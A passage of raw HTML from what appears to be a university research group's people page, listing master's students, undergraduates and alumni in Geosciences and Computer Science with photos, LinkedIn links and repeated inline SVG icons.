17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n            <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\" class=\"wp-image-1758 style-854-image style-local-182-c129-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-md-shah-sayem-e1697207514119.jpg\" class=\"wp-image-1761 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c143\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c143 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c155\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c155 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c156-outer\">\n            <div data-colibri-id=\"182-c156\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c156 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c157\" class=\"h-global-transition-all h-heading style-844 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c157\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c144\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c144 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c145-outer\">\n            <div data-colibri-id=\"182-c145\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c145 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c146\" class=\"d-block style-831 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\" class=\"wp-image-1763 style-831-image style-local-182-c146-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c146-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c147\" class=\"h-global-transition-all h-heading style-832 style-local-182-c147 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c147\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c148\" class=\"h-text h-text-component style-833 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c149\" class=\"style-835 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c150-outer\">\n            <div data-colibri-id=\"182-c150\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c150 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c151\" class=\"d-block style-831 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-IMG_9249-e1697207848252.jpg\" class=\"wp-image-1765 style-831-image style-local-182-c151-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c151-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c152\" class=\"h-global-transition-all h-heading style-832 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c152\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">MD Raiyan Haque</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c153\" class=\"h-text h-text-component style-833 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"style-835 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"	 4:40 PM       https://www.linkedin.com/in/mdraiyanhaque/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c158\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c158 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c214\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c214 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c215-outer\">\n            <div data-colibri-id=\"182-c215\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c215 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c216\" class=\"h-global-transition-all h-heading style-926 style-local-182-c216 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c216\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c159\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c159 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c160-outer\">\n            <div data-colibri-id=\"182-c160\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c160 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c161\" class=\"d-block style-913 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\" class=\"wp-image-1772 style-913-image style-local-182-c161-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c161-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c162\" class=\"h-global-transition-all h-heading style-914 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c162\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c163\" class=\"h-text h-text-component style-915 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c164\" class=\"style-917 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c165-outer\">\n            <div data-colibri-id=\"182-c165\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c165 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c166\" class=\"d-block style-918 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Anvith-e1697208489419.jpg\" class=\"wp-image-1780 style-918-image style-local-182-c166-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c166-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c167\" class=\"h-global-transition-all h-heading style-914 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c167\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-text h-text-component style-915 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"style-919 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 